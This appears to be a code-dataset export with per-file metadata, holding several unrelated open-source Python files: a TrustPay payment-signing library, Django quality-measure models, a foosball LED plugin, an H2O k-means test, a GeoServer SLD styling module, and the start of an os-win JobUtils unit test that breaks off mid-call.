def build_redirect(**kw): return _build_nt_cls(TrustPayRedirect, kw) def build_notification(**kw): return _build_nt_cls(TrustPayNotification, kw) def build_pay_request(**kw): return _build_nt_cls(TrustPayRequest, kw) def build_test_environment(**kw): kw["api_url"] = kw.get("api_url", TEST_API_URL) return _build_nt_cls(TrustPayEnvironment, kw, fnc=lambda v: v) def build_environment(**kw): kw["api_url"] = kw.get("api_url", API_URL) return _build_nt_cls(TrustPayEnvironment, kw, fnc=lambda v: v) def sign_message(key, msg): if sys.version_info[0] == 3: msg, key = str.encode(msg), str.encode(key) return hmac.new(key, msg, hashlib.sha256).hexdigest().upper() def extract_attrs(obj, attrs): return [getattr(obj, attr) for attr in attrs] def merge_env_with_request( env, request, fnc=lambda v1, v2: v1 if v2 is None else v2, ): kw = {} kw['AID'] = fnc(env.aid, request.AID) kw['URL'] = fnc(env.redirect_url, request.URL) kw['RURL'] = fnc(env.success_url, request.RURL) kw['CURL'] = fnc(env.cancel_url, request.CURL) kw['EURL'] = fnc(env.error_url, request.EURL) kw['NURL'] = fnc(env.notification_url, request.NURL) kw['CUR'] = fnc(env.currency, request.CUR) kw['LNG'] = fnc(env.language, request.LNG) kw['CNT'] = fnc(env.country, request.CNT) return request._replace(**kw) def 
_build_link(url, query_dict, fmt="{url}?{params}"): return fmt.format(url=url, params=urlencode(query_dict)) def _filter_dict_nones(d): res = {} for key, value in d.items(): if value is not None: res[key] = value return res def _initial_data(pay_request): return _filter_dict_nones(pay_request._asdict()) def build_link_for_request(url, request): return _build_link(url, _initial_data(request)) class TrustPay(object): #: Requests attributes from which signature message is #: concatenated (in this specific order). SIGNATURE_ATTRS = ("AID", "AMT", "CUR", "REF") #: Notification signature attributes. NOTIFICATION_SIGNATURE_ATTRS = ( "AID", "TYP", "AMT", "CUR", "REF", "RES", "TID", "OID", "TSS" ) #: Not signed request required attributes. REQUEST_REQUIRED_ATTRS = ("AID", "CUR") #: Signed request required attributes. SIGNED_REQUEST_REQUIRED_ATTRS = REQUEST_REQUIRED_ATTRS + ( "AMT", "REF", "SIG") #: Supported currencies (:attr:`trustpaylib.CURRENCIES`) CURRENCIES = CURRENCIES #: Supported languages LANGUAGES = LANGUAGES #: Supported countries COUNTRIES = COUNTRIES RESULT_CODES = RESULT_CODES RESULT_CODES_DESC = RESULT_CODES_DESC def __init__(self, environment): self.environment = environment def sign_request(self, pay_request): """ Sign payment request. Args: pay_request (:class:`trustpaylib.TrustPayRequest`): Payment request already prepared for signing. Returns: New :class:`trustpaylib.TrustPayRequest` instance with `SIG` attribute set to generated signature. """ return pay_request._replace( SIG=self.pay_request_signature(pay_request)) def pay_request_signature(self, pay_request): """ Use environments secret key to generate hash to sign pay request. Args: pay_request (:class:`trustpaylib.TrustPayRequest`): Payment request already prepared for signing. Returns: Hash. """ return sign_message( self.environment.secret_key, self.create_signature_msg(pay_request), ) def merge_env_with_request(self, pay_request): """ Merge specific attributes of environment with payment request. Args: pay_request (:class:`trustpaylib.TrustPayRequest`): Payment request to merge. Returns: New :class:`trustpaylib.TrustPayRequest` instance with attributes merged with those in environment if not already set on `pay_request`. """ return merge_env_with_request( self.environment, pay_request, ) def finalize_request( self, pay_request, sign=True, validate=True, merge_env=True ): """ Raw payment request is merged with environment, signed and validated. Args: pay_request (:class:`trustpaylib.TrustPayRequest`): sign (bool): If `False`, don't sign pay request. validate (bool): If `False`, don't validate pay request. merge_env (bool): If `False`, don't merge pay request with env. Returns: New :class:`trustpaylib.TrustPayRequest` prepared for building link or creating form. """ pr = pay_request if merge_env: pr = self.merge_env_with_request(pay_request) if sign: pr = self.sign_request(pr) if validate: pr = self.validate_request(pr) return pr def build_link( self, pay_request, sign=True, validate=True, merge_env=True ): """ Finalizes raw payment request and generates redirect link. Args: pay_request (:class:`trustpaylib.TrustPayRequest`): sign (bool): If `False`, don't sign pay request. validate (bool): If `False`, don't validate pay request. merge_env (bool): If `False`, don't merge pay request with env. Returns: string: Redirect link. 
""" return _build_link( self.environment.api_url, self.initial_data( self.finalize_request( pay_request, sign=sign, validate=validate, merge_env=merge_env, ) ), ) def check_notification_signature(self, notification): """ Check if notification is signed with environment's secret key. Args: notification (:class:`trustpaylib.TrustPayNotification`) Returns: bool """ msg = unicode("").join( [self.environment.aid, ] + extract_attrs(notification, self.NOTIFICATION_SIGNATURE_ATTRS[1:]) ) return sign_message( self.environment.secret_key, msg) == notification.SIG @classmethod def create_signature_msg(cls, pay_request): """ Concatenate set of payment request attributes and creates message to be hashed. Args: pay_request (:class:`trustpaylib.TrustPayRequest`): Returns: string: Signature message. """ return unicode("").join( [ attr for attr in cls.extract_signature_attrs(pay_request) if attr is not None ] ) @classmethod def get_result_desc(cls, rc): """Returns description of result code. Args: rc (int|string): Result code from redirect or notification. Returns: Named tuple with `short` and `long` attributes for short, long description. (:attr:`trustpaylib.RESULT_CODES_DESC`) >>> TrustPay.get_result_desc(1001).short 'Invalid request' >>> TrustPay.get_result_desc(1001).long 'Data sent is not properly formatted.' """ return cls.RESULT_CODES_DESC[str(rc)] @classmethod def get_result_desc_from_notification(cls, notif): return cls.get_result_desc(notif.RES) @classmethod def get_result_desc_from_redirect(cls, redirect): return cls.get_result_desc(redirect.RES) @classmethod def validate_currency(cls, pay_request): if ( pay_request.CUR is not None and pay_request.CUR not in cls.CURRENCIES ): raise ValueError( "Currency [%r] not in supported currencies [%r]" % ( pay_request.CUR, cls.CURRENCIES, ) ) @classmethod def validate_language(cls, pay_request): if ( pay_request.LNG is not None and pay_request.LNG not in cls.LANGUAGES ): raise ValueError( "Language [%r] not int supported languages [%r]" % ( pay_request.LNG, cls.LANGUAGES, ) ) @classmethod def validate_country(cls, pay_request): if ( pay_request.CNT is not None and pay_request.CNT not in cls.COUNTRIES ): raise ValueError( "Country [%r] not int supported countries [%r]" % ( pay_request.CNT, cls.COUNTRIES, ) ) @classmethod def validate_request(cls, pay_request): """Validate payment request. Check if all attributes for signed/non-signed payment request are present. Check if amount has at max two decimal places. On validation errors, raises :exc:`ValueError`. Args: pay_request (:class:`trustpaylib.TrustPayRequest`): Returns: Given `pay_request`. Raises: ValueError """ missing = [] required_attrs = ( cls.REQUEST_REQUIRED_ATTRS if pay_request.SIG is None else cls.SIGNED_REQUEST_REQUIRED_ATTRS ) for attr in required_attrs: if attr not in cls.initial_data(pay_request): missing.append(attr) if pay_request.AMT is not None and '.' in pay_request.AMT: if len(pay_request.AMT.split('.')[1]) > 2: raise ValueError( "Amount can have at max" " 2 decimal places. [%s]" % pay_request.AMT) if missing: raise ValueError("Required attributes missing: %r" % missing) cls.validate_currency(pay_request) cls.validate_language(pay_request) cls.validate_country(pay_request) return pay_request @classmethod def extract_signature_attrs(cls, pay_request): return extract_attrs(pay_request, cls.SIGNATURE_ATTRS) @staticmethod def initial_data(pay_request): return _initial_data(pay_request) if __name__ == "__main__": import doctest doctest.testmod()
bsd-3-clause
4,386,366,306,178,861,600
26.546032
78
0.576755
false
3.842781
false
false
false
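A short usage sketch for the module above; the account id and secret key are placeholder values, not real credentials:

import trustpaylib

env = trustpaylib.build_test_environment(
    aid="1234567890",        # assumed merchant account id
    secret_key="secret",     # assumed signing key
    currency=trustpaylib.CURRENCIES.EUR,
    language=trustpaylib.LANGUAGES.en,
    country=trustpaylib.COUNTRIES.SK,
    success_url="https://example.com/ok",
    error_url="https://example.com/error",
    cancel_url="https://example.com/cancel",
    notification_url="https://example.com/notify")

tp = trustpaylib.TrustPay(env)
req = trustpaylib.build_pay_request(AMT="9.99", REF="order-42")
print(tp.build_link(req))  # merged with the environment, signed, validated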
MOOCworkbench/MOOCworkbench
quality_manager/models.py
1
2510
from django.db import models
from django.template.defaultfilters import slugify
from model_utils.models import TimeStampedModel

from experiments_manager.models import ChosenExperimentSteps


class ExperimentMeasure(models.Model):
    name = models.CharField(max_length=255, editable=False)
    description = models.TextField()
    high_message = models.CharField(max_length=255, default='High')
    medium_message = models.CharField(max_length=255, default='Medium')
    low_message = models.CharField(max_length=255, default='Low')

    def __str__(self):
        return 'Measurement of {0}'.format(self.name)

    def get_low_message(self):
        return '{0}: {1}'.format(self.name, self.low_message)

    def get_medium_message(self):
        return '{0}: {1}'.format(self.name, self.medium_message)

    def get_high_message(self):
        return '{0}: {1}'.format(self.name, self.high_message)

    def slug(self):
        return slugify(self.name).replace('-', '_')


class RawMeasureResult(models.Model):
    key = models.CharField(max_length=255)
    value = models.CharField(max_length=1000)

    def __str__(self):
        return 'Key: {0} with value: {1}'.format(self.key, str(self.value))


class ExperimentMeasureResult(TimeStampedModel):
    HIGH = 'H'
    MEDIUM = 'M'
    LOW = 'L'

    SCALE = (
        (HIGH, 'High'),
        (MEDIUM, 'Medium'),
        (LOW, 'Low'),
    )

    step = models.ForeignKey(to=ChosenExperimentSteps)
    measurement = models.ForeignKey(to=ExperimentMeasure)
    result = models.CharField(max_length=1, choices=SCALE)
    raw_values = models.ManyToManyField(to=RawMeasureResult)

    def get_message(self):
        message_dict = {ExperimentMeasureResult.LOW: self.measurement.get_low_message(),
                        ExperimentMeasureResult.MEDIUM: self.measurement.get_medium_message(),
                        ExperimentMeasureResult.HIGH: self.measurement.get_high_message()}
        if self.result:
            return message_dict[self.result]
        return 'Result missing'

    def get_class(self):
        style_classes = {ExperimentMeasureResult.LOW: 'danger',
                         ExperimentMeasureResult.MEDIUM: 'warning',
                         ExperimentMeasureResult.HIGH: 'success'}
        if not self.result:
            return "default"
        return style_classes[self.result]

    def slug(self):
        return self.measurement.slug()

    def __str__(self):
        return "Workbench scan of {0}".format(self.measurement.name)
mit
-3,190,671,055,506,624,500
32.466667
94
0.650199
false
3.903577
false
false
false
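A small sketch of how these models render a result (unsaved instances, so no database round-trip is needed; assumes a configured Django settings module and that the app is importable as quality_manager):

from quality_manager.models import ExperimentMeasure, ExperimentMeasureResult

measure = ExperimentMeasure(name="Testing",                      # illustrative values
                            description="Degree of test coverage",
                            low_message="Add some tests")
result = ExperimentMeasureResult(measurement=measure,
                                 result=ExperimentMeasureResult.LOW)
print(result.get_message())  # "Testing: Add some tests"
print(result.get_class())    # "danger" -- contextual CSS class for the result row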
swehner/foos
plugins/leds.py
1
3191
#!/usr/bin/env python

import time
import sys
import threading
import queue
import collections
from foos.bus import Bus


class Pattern:
    def __init__(self, time, leds=[]):
        self.time = time
        self.leds = leds


def flatten(l):
    for el in l:
        if isinstance(el, collections.Iterable):
            for sub in flatten(el):
                yield sub
        else:
            yield el


class Plugin:
    def __init__(self, bus):
        self.queue = queue.Queue()
        self.bus = bus
        fmap = {'score_goal': lambda d: self.setMode(pat_goal),
                'upload_ok': lambda d: self.setMode(pat_ok),
                'tv_standby': lambda d: self.setMode(pat_standby, loop=True),
                'tv_on': lambda d: self.setMode([]),
                'button_will_upload': lambda d: self.setMode(pat_upload_feedback),
                'upload_error': lambda d: self.setMode(pat_error)}
        self.bus.subscribe_map(fmap)
        self.thread = threading.Thread(target=self.run)
        self.thread.daemon = True
        self.thread.start()

    def run(self):
        while True:
            loop, m = self.queue.get()
            first = True
            while first or loop:
                first = False
                for p in flatten(m):
                    if self.__canRun():
                        self.setLeds(p.leds)
                        self.__safeSleep(p.time)
                    else:
                        loop = False
                        break
            # reset leds
            self.setLeds()

    def __safeSleep(self, t):
        start = time.time()
        while (time.time() < start + t) and self.__canRun():
            time.sleep(0.05)

    def __canRun(self):
        return self.queue.empty()

    def setLeds(self, leds=[]):
        self.bus.notify("leds_enabled", leds)

    def setMode(self, mode, loop=False):
        self.stop = True
        self.queue.put((loop, mode))


pat_reset = 3 * [Pattern(0.2, ["BI", "BD", "YI", "YD"]),
                 Pattern(0.1),
                 Pattern(0.2, ["BI", "BD", "YI", "YD"]),
                 Pattern(1)]
pat_standby = [Pattern(1, ["OK"]),
               Pattern(1)]
pat_goal = [[Pattern(0.1, ["BD", "YD"]),
             Pattern(0.1, ["OK"]),
             Pattern(0.1, ["BI", "YI"])],
            3 * [Pattern(0.1),
                 Pattern(0.1, ["BI", "BD", "OK", "YI", "YD"])]]
pat_ok = [Pattern(0.3, ["OK"])]
pat_upload_feedback = 2 * [Pattern(0.1, ["OK"]),
                           Pattern(0.1)]
pat_error = 2 * [Pattern(0.3, ["YD", "BD"]),
                 Pattern(0.3)]
pat_demo = [Pattern(1, ["BD"]),
            Pattern(1, ["BI"]),
            Pattern(1, ["YD"]),
            Pattern(1, ["YI"]),
            Pattern(1, ["OK"])]

if __name__ == "__main__":
    def write_data(led_event):
        leds = led_event.data
        print("\r", end="")
        for led in ["BD", "BI", "OK", "YI", "YD"]:
            print("0" if led in leds else " ", end=" ")
        sys.stdout.flush()

    bus = Bus()
    bus.subscribe(write_data, thread=True)
    controller = Plugin(bus)
    controller.setMode(pat_standby, loop=True)
    time.sleep(5)
    controller.setMode(pat_goal)
    time.sleep(5)
gpl-3.0
-5,291,139,710,385,785,000
26.508621
82
0.483861
false
3.468478
false
false
false
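Custom blink patterns can be composed the same way as the built-ins above; a hypothetical example (assumes the foos package and this plugin module are importable):

from foos.bus import Bus
from plugins.leds import Pattern, Plugin, pat_standby

# Alternate the yellow and blue LEDs three times (made-up pattern).
pat_alternate = 3 * [Pattern(0.2, ["YI", "YD"]),
                     Pattern(0.2, ["BI", "BD"])]

bus = Bus()
plugin = Plugin(bus)
plugin.setMode(pat_alternate)           # play once
plugin.setMode(pat_standby, loop=True)  # or loop a mode until the next setMode()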
ChristosChristofidis/h2o-3
h2o-py/tests/testdir_hdfs/pyunit_NOPASS_HDFS_kmeans_mllib_1_large.py
1
2412
#----------------------------------------------------------------------
# Purpose:  This test compares k-means centers between H2O and MLlib.
#----------------------------------------------------------------------

import sys
sys.path.insert(1, "../../")
import h2o
import numpy as np


def kmeans_mllib(ip, port):
    h2o.init(ip, port)

    # Check if we are running inside the H2O network by seeing if we can touch
    # the namenode.
    running_inside_h2o = h2o.is_running_internal_to_h2o()

    if running_inside_h2o:
        hdfs_name_node = h2o.get_h2o_internal_hdfs_name_node()
        hdfs_cross_file = "/datasets/runit/BigCross.data"

        print "Import BigCross.data from HDFS"
        url = "hdfs://{0}{1}".format(hdfs_name_node, hdfs_cross_file)
        cross_h2o = h2o.import_frame(url)
        n = cross_h2o.nrow()

        err_mllib = np.genfromtxt(h2o.locate("smalldata/mllib_bench/bigcross_wcsse.csv"), delimiter=",", skip_header=1)
        ncent = [int(err_mllib[r][0]) for r in range(len(err_mllib))]

        for k in ncent:
            print "Run k-means++ with k = {0} and max_iterations = 10".format(k)
            cross_km = h2o.kmeans(training_frame = cross_h2o, x = cross_h2o, k = k, init = "PlusPlus",
                                  max_iterations = 10, standardize = False)

            clust_mllib = np.genfromtxt(h2o.locate("smalldata/mllib_bench/bigcross_centers_" + str(k) + ".csv"),
                                        delimiter=",").tolist()
            clust_h2o = cross_km.centers()

            # Sort in ascending order by first dimension for comparison purposes
            clust_mllib.sort(key=lambda x: x[0])
            clust_h2o.sort(key=lambda x: x[0])

            print "\nMLlib Cluster Centers:\n"
            print clust_mllib
            print "\nH2O Cluster Centers:\n"
            print clust_h2o

            wcsse_mllib = err_mllib[err_mllib[0:4,0].tolist().index(k)][1]
            wcsse_h2o = cross_km.tot_withinss() / n
            print "\nMLlib Average Within-Cluster SSE: {0}\n".format(wcsse_mllib)
            print "H2O Average Within-Cluster SSE: {0}\n".format(wcsse_h2o)
            assert wcsse_h2o == wcsse_mllib, "Expected mllib and h2o to get the same wcsse. Mllib got {0}, and H2O " \
                                             "got {1}".format(wcsse_mllib, wcsse_h2o)


if __name__ == "__main__":
    h2o.run_test(sys.argv, kmeans_mllib)
apache-2.0
-4,750,684,882,160,498,000
42.872727
119
0.548093
false
3.272727
false
false
false
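The statistic compared in the test above is the average within-cluster SSE; for reference, the same quantity written in plain numpy (standalone, illustrative data):

import numpy as np

def avg_wcsse(points, centers, labels):
    # mean squared distance of each point to its assigned cluster center
    diffs = points - centers[labels]
    return np.sum(diffs ** 2) / len(points)

pts = np.array([[0.0, 0.0], [0.0, 1.0], [10.0, 10.0]])
ctr = np.array([[0.0, 0.5], [10.0, 10.0]])
lbl = np.array([0, 0, 1])
print(avg_wcsse(pts, ctr, lbl))  # (0.25 + 0.25 + 0.0) / 3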
GeographicaGS/GeoServer-Python-REST-API
src/geoserverapirest/ext/sld/sld.py
1
15360
#!/usr/bin/env python # coding=UTF-8 import geoserverapirest.ext.sld.core as core, geoserverapirest.ext.sld.color as color import geoserverapirest.ext.sld.ranges as ranges """ This set of classes works as helpers to construct SLD and should be the only entry point to this module. They are designed to work supplying dictionaries of properties so they can be used by means of defining objects via dictionaries. """ strokeLineJoin = core.strokeLineJoin class Automation(object): """ Automation objects base class. All this classes do something in the __init__ and store the final output in the out variable. This out variable can be retrieved just by calling the object as WhateverAutomationObject(). """ out = None def __call__(self): """ Treat self.sld() as itself. """ return self.out # ----------------- # Semiology Classes # ----------------- class SemiologyStroke(Automation): """ Automation for stroke semiology. Takes a stroke specification as a dictionary and stores a sld.GsSldStrokeSymbolizer: stroke = { "class": sld.SemiologyStroke, "color": "#3e3e3e", "width": 2, "linejoin": strokeLineJoin["bevel"] } """ def __init__(self, params): self.out = core.GsSldStrokeSymbolizer(params["color"], params["width"], params["linejoin"]) class SemiologyFill(Automation): """ Automation for fill semiology. Takes a fill specification as a dictionary and stores a sld.GsSldFillSymbolizer: fill = { "class": sld.SemiologyFill, "color": "#e3e2e1" } """ def __init__(self, params): self.out = core.GsSldFillSymbolizer(params["color"]) class SemiologyPolygon(Automation): """ Automation for polygon semiology. Takes a polygon symbol specification as a dictionary and stores a sld.GsSldPolygonSymbolizer: polygonStrokeFill = { "class": sld.SemiologyPolygon, "stroke": stroke, "fill": fill } """ def __init__(self, params): self.out = core.GsSldPolygonSymbolizer() if "stroke" in params.keys(): self.out.addSymbol(SemiologyStroke(params["stroke"])()) if "fill" in params.keys(): self.out.addSymbol(SemiologyFill(params["fill"])()) class SemiologyPolygonSimpleRamp(Automation): """ Automation for a polygon simple ramp. Takes a polygon simple ramp specification as a dictionary and stores a list of sld.GsSldPolygonSymbolizer: polygonSimpleRamp = { "class": sld.SemiologyPolygonSimpleRamp, "stroke": stroke, "low": "#dedece", "high": "#4a4140" } """ def __init__(self, params, steps): self.out = [] c = color.Color() colors = c.colorRamp(params["low"], params["high"], steps) for i in range(0, steps): o = core.GsSldPolygonSymbolizer() if "stroke" in params.keys(): o.addSymbol(SemiologyStroke(params["stroke"])()) o.addSymbol(SemiologyFill({"color": colors[i]})()) self.out.append(o) class SemiologyPolygonDoubleRamp(Automation): """ Automation for a polygon double ramp. Takes a polygon double ramp specification as a dictionary and stores a list of sld.GsSldPolygonSymbolizer: polygonDoubleRamp = { "class": sld.SemiologyPolygonDoubleRamp, "stroke": stroke, "low": "#ff0000", "middle": "#ffffff", "high": "#0000ff" } """ def __init__(self, params, sidesteps): self.out = [] c = color.Color() colors = c.colorDualRamp(params["low"], params["middle"], params["high"], sidesteps) for i in range(0, (sidesteps*2)+1): o = core.GsSldPolygonSymbolizer() if "stroke" in params.keys(): o.addSymbol(SemiologyStroke(params["stroke"])()) o.addSymbol(SemiologyFill({"color": colors[i]})()) self.out.append(o) class SemiologyPolygonCustomRamp(Automation): """ Automation for a polygon custom ramp. 
Takes a polygon custom ramp specification as a dictionary and stores a list of sld.GsSldPolygonSymbolizer: polygonCustomRamp = { "class": sld.SemiologyPolygonCustomRamp, "stroke": stroke, "colors": ["#ff0000", "#00ff00", "#0000ff"] } """ def __init__(self, params): self.out = [] for i in params["colors"]: o = core.GsSldPolygonSymbolizer() if "stroke" in params.keys(): o.addSymbol(SemiologyStroke(params["stroke"])()) o.addSymbol(SemiologyFill({"color": i})()) self.out.append(o) # ----------------- # Condition Classes # ----------------- class ConditionGtoe(Automation): """ Automation for GTOE condition. Takes a condition specification as a dictionary and stores a GsSldConditionGtoe: ConditionGtoe = { "class": sld.ConditionGtoe, "attribute": "area", "value": 20000000 } """ def __init__(self, params): self.out = core.GsSldConditionGtoe(params["attribute"], params["value"]) class ConditionLtoe(Automation): """ Automation for LTOE condition. Takes a condition specification as a dictionary and stores a GsSldConditionLtoe: ConditionLtoe = { "class": sld.ConditionLtoe, "attribute": "area", "value": 20000000 } """ def __init__(self, params): self.out = core.GsSldConditionLtoe(params["attribute"], params["value"]) class ConditionEqual(Automation): """ Automation for EQUAL condition. Takes a condition specification as a dictionary and stores a GsSldConditionEqual: ConditionEqual = { "class": sld.ConditionEqual, "attribute": "PROVINCIA", "value": "Córdoba" } """ def __init__(self, params): self.out = core.GsSldConditionEqual(params["attribute"], params["value"]) class ConditionAnd(Automation): """ Automation for AND condition. Takes a condition specification as a dictionary and stores a GsSldConditionAnd: conditionAnd = { "class": sld.ConditionAnd, "c0": conditionLtoe, "c1": conditionEqual } """ def __init__(self, params): self.out = core.GsSldConditionAnd(params["c0"]["class"](params["c0"])(), params["c1"]["class"](params["c1"])()) class ConditionOr(Automation): """ Automation for OR condition. Takes a condition specification as a dictionary and stores a GsSldConditionOr: conditionOr = { "class": sld.ConditionOr, "c0": conditionLtoe, "c1": conditionEqual } """ def __init__(self, params): self.out = core.GsSldConditionOr(params["c0"]["class"](params["c0"])(), params["c1"]["class"](params["c1"])() ) # ----------------- # Ranges automation # ----------------- class RangesQuartileMiddle(Automation): """ TODO: Redo this Automation for a Jenks middle range calculation. :param data: Data to create intervals from. :type data: List :param sideIntervals: Number of side intervals :type sideIntervals: integer :param precision: Precision :type precision: integer """ def __init__(self, data, sideIntervals, middleValue, precision): a = ranges.Range() self.out = a.quartileMiddleInterval(data, sideIntervals, middleValue, precision) class RangesQuartile(Automation): """ Automation for a quartile range calculation. :param data: Data to create intervals from. :type data: List :param intervals: Number of intervals :type intervals: integer :param precision: Precision :type precision: integer """ def __init__(self, data, intervals, precision): a = ranges.Range() self.out = a.quartileInterval(data, intervals, precision) class RangesEqualMiddle(Automation): """ TODO: Redo this Automation for a Jenks middle range calculation. :param data: Data to create intervals from. 
:type data: List :param sideIntervals: Number of side intervals :type sideIntervals: integer :param precision: Precision :type precision: integer """ def __init__(self, data, sideIntervals, middleValue, precision): a = ranges.Range() self.out = a.equalMiddleInterval(data, sideIntervals, middleValue, precision) class RangesEqual(Automation): """ Automation for a equal range calculation. :param data: Data to create intervals from. :type data: List :param intervals: Number of intervals :type intervals: integer :param precision: Precision :type precision: integer """ def __init__(self, data, intervals, precision): a = ranges.Range() self.out = a.equalInterval(data, intervals, precision) class RangesJenksMiddle(Automation): """ Automation for a Jenks middle range calculation. :param data: Data to create intervals from. :type data: List :param sideIntervals: Number of side intervals :type sideIntervals: integer :param precision: Precision :type precision: integer """ def __init__(self, data, sideIntervals, middleValue, precision): a = ranges.Range() self.out = a.jenksMiddleInterval(data, sideIntervals, middleValue, precision) class RangesJenks(Automation): """ Automation for a jenks range calculation. :param data: Data to create intervals from. :type data: List :param intervals: Number of intervals :type intervals: integer :param precision: Precision :type precision: integer """ def __init__(self, data, intervals, precision): a = ranges.Range() self.out = a.jenksInterval(data, intervals, precision) # --------------------- # Full style automation # --------------------- class StyleBuilder(object): """ This is the base style builder. :param namedLayerName: Name of the named layer :type namedLayerName: String :param styleName: Name of the style :type styleName: String :param ruleNames: A list of Strings with the names of the rules. :type ruleNames: List :param conditions: A list of geoserverapirest.ext.sld.core.GsSldConditionXXX with the conditions. :type conditions: List :param symbols: A list of geoserverapirest.ext.sld.core.GsSldPolygonSymbolizer with the symbolizers. :type symbols: List """ @staticmethod def build(namedLayerName, styleName, ruleNames, conditions, symbols): ft = core.GsSldFeatureTypeStyle() filters = [] if conditions is not None: for i in conditions: if i is not None: filter = core.GsSldFilter() filter.addCondition(i) filters.append(filter) else: filters.append(i) for i in range(0, len(ruleNames)): r = core.GsSldRule(ruleNames[i].replace(" ", "_").lower(), ruleNames[i]) r.addSymbolizer(symbols[i]) if filters<>[]: if filters[i] is not None: r.addFilter(filters[i]) ft.addRule(r) us = core.GsSldUserStyle(styleName) us.addFeatureTypeStyle(ft) nl = core.GsSldNamedLayer(namedLayerName) nl.addUserStyle(us) root = core.GsSldRoot() root.addNamedLayer(nl) return root class StyleCustom(Automation): """ Automation for a full custom SLD style. Takes a style specification as a dictionary and builds a full SLD. See test_18_automation.py for examples. """ def __init__(self, params): symbols = [a["class"](a)() for a in params["symbols"]] conditions = [a["class"](a)() for a in params["conditions"]] if "conditions" in params.keys() else None self.out = StyleBuilder.build(params["namedlayername"], params["stylename"], params["rulenames"], conditions, symbols) class StyleSimpleIntervals(Automation): """ Automation for a simple intervals SLD style. Takes a style specification as a dictionary and builds a full SLD. See test_18_automation.py for examples. 
""" def __init__(self, params): data = params["datasource"]["class"](params["datasource"])() rang = params["rangetype"](data, params["steps"], params["precision"])() conditions = [] for r in rang: c = {"class": ConditionAnd, "c0": { "class": ConditionGtoe, "attribute": params["datasource"]["attributename"], "value": r[0]}, "c1": { "class": ConditionLtoe, "attribute": params["datasource"]["attributename"], "value": r[1]}} conditions.append(c["class"](c)()) symbols = params["ramp"]["class"](params["ramp"], params["steps"])() rn = ranges.RuleNames() ruleNames = rn.ruleNames(rang, params["rulenames"]["mono"], params["rulenames"]["dual"], params["rulenames"]["lambda"]) self.out = StyleBuilder.build(params["namedlayername"], params["stylename"], ruleNames, conditions, symbols) class StyleCenteredIntervals(Automation): """ Automation for a double ramp. Takes a style specification as a dictionary and builds a full SLD. See test_18_automation.py for examples. """ def __init__(self, params): data = params["datasource"]["class"](params["datasource"])() # Data below and above median below = [a for a in data if a<params["mediandata"]] above = [a for a in data if a>params["mediandata"]] #TODO: Erase median Ranges. A waste of time belowIntervals = params["rangetype"](below, params["steps"], params["precision"])() aboveIntervals = params["rangetype"](above, params["steps"], params["precision"])() belowIntervals.append([params["mediandata"], params["mediandata"]]) belowIntervals.extend(aboveIntervals) conditions = [] # TODO: This is duplicated in the class above, take apart for r in belowIntervals: c = {"class": ConditionAnd, "c0": { "class": ConditionGtoe, "attribute": params["datasource"]["attributename"], "value": r[0]}, "c1": { "class": ConditionLtoe, "attribute": params["datasource"]["attributename"], "value": r[1]}} conditions.append(c["class"](c)()) symbols = params["ramp"]["class"](params["ramp"], params["steps"])() rn = ranges.RuleNames() ruleNames = rn.ruleNames(belowIntervals, params["rulenames"]["mono"], params["rulenames"]["dual"], \ params["rulenames"]["lambda"]) self.out = StyleBuilder.build(params["namedlayername"], params["stylename"], ruleNames, conditions, symbols)
mit
7,179,470,238,680,441,000
26.824275
127
0.601081
false
3.960547
false
false
false
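Tying the Automation classes above together: a hypothetical style definition in the dictionary form they consume (keys and classes follow the module's docstrings; the layer and attribute names are made up):

import geoserverapirest.ext.sld.sld as sld

style = {
    "class": sld.StyleCustom,
    "namedlayername": "municipalities",      # assumed layer name
    "stylename": "municipalities_area",
    "rulenames": ["Large areas"],
    "symbols": [{
        "class": sld.SemiologyPolygon,
        "stroke": {"class": sld.SemiologyStroke,
                   "color": "#3e3e3e", "width": 2,
                   "linejoin": sld.strokeLineJoin["bevel"]},
        "fill": {"class": sld.SemiologyFill, "color": "#e3e2e1"}}],
    "conditions": [{
        "class": sld.ConditionGtoe,
        "attribute": "area", "value": 20000000}]}

sld_root = style["class"](style)()  # returns the populated GsSldRoot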
openstack/os-win
os_win/tests/unit/utils/test_jobutils.py
1
14327
# Copyright 2015 Cloudbase Solutions Srl
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.

from unittest import mock

import ddt

from os_win import constants
from os_win import exceptions
from os_win.tests.unit import test_base
from os_win.utils import jobutils


@ddt.ddt
class JobUtilsTestCase(test_base.OsWinBaseTestCase):
    """Unit tests for the Hyper-V JobUtils class."""

    _FAKE_RET_VAL = 0

    _FAKE_JOB_STATUS_BAD = -1
    _FAKE_JOB_DESCRIPTION = "fake_job_description"
    _FAKE_JOB_PATH = 'fake_job_path'
    _FAKE_ERROR = "fake_error"
    _FAKE_ELAPSED_TIME = 0

    def setUp(self):
        super(JobUtilsTestCase, self).setUp()
        self.jobutils = jobutils.JobUtils()
        self.jobutils._conn_attr = mock.MagicMock()

    @mock.patch.object(jobutils.JobUtils, '_wait_for_job')
    def test_check_ret_val_started(self, mock_wait_for_job):
        self.jobutils.check_ret_val(constants.WMI_JOB_STATUS_STARTED,
                                    mock.sentinel.job_path)
        mock_wait_for_job.assert_called_once_with(mock.sentinel.job_path)

    @mock.patch.object(jobutils.JobUtils, '_wait_for_job')
    def test_check_ret_val_ok(self, mock_wait_for_job):
        self.jobutils.check_ret_val(self._FAKE_RET_VAL,
                                    mock.sentinel.job_path)
        self.assertFalse(mock_wait_for_job.called)

    def test_check_ret_val_exception(self):
        self.assertRaises(exceptions.WMIJobFailed,
                          self.jobutils.check_ret_val,
                          mock.sentinel.ret_val_bad,
                          mock.sentinel.job_path)

    def test_wait_for_job_ok(self):
        mock_job = self._prepare_wait_for_job(
            constants.JOB_STATE_COMPLETED_WITH_WARNINGS)
        job = self.jobutils._wait_for_job(self._FAKE_JOB_PATH)
        self.assertEqual(mock_job, job)

    def test_wait_for_job_error_state(self):
        self._prepare_wait_for_job(
            constants.JOB_STATE_TERMINATED)
        self.assertRaises(exceptions.WMIJobFailed,
                          self.jobutils._wait_for_job,
                          self._FAKE_JOB_PATH)

    def test_wait_for_job_error_code(self):
        self._prepare_wait_for_job(
            constants.JOB_STATE_COMPLETED_WITH_WARNINGS,
            error_code=1)
        self.assertRaises(exceptions.WMIJobFailed,
                          self.jobutils._wait_for_job,
